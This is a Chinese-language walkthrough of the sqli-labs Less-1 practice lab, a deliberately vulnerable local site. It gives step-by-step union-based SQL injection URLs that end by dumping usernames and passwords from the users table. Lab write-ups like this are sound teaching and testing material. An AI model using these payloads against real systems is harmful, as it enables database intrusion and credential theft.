前言
提示:这个题目是基于错误,单引号,字符型注入
1、测试是否存在注入点
http://localhost/sqli-labs/Less-1/?id=1'
http://localhost/sqli-labs/Less-1/?id=1' and 1=1 -- +
http://localhost/sqli-labs/Less-1/?id=1' and 1=2 -- +
证明我们后面输入的sql语句被带入到数据库进行查询了,说明存在sql注入
2、判断字段数
http://localhost/sqli-labs/Less-1/?id=1' order by 4 -- +
http://localhost/sqli-labs/Less-1/?id=1' order by 3 -- +
3、查看回显点
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3 -- + // id=-1 查询为空 后面的查询才能显示出来
4、联合查询
1)查看当前用户和当前数据库名:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,user(),database() -- +
2)查看当前库所有表名:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3 -- +
3)查看users表中的列名:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where TABLE_SCHEMA='security' and table_name='users') --+
4)查看用户名和密码:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(concat_ws(" ",username,password)) from security.users) --+
先将查询出来的用户名和密码以空格链接,这样在用group_concat连接后更容易分辨出用户名个密码。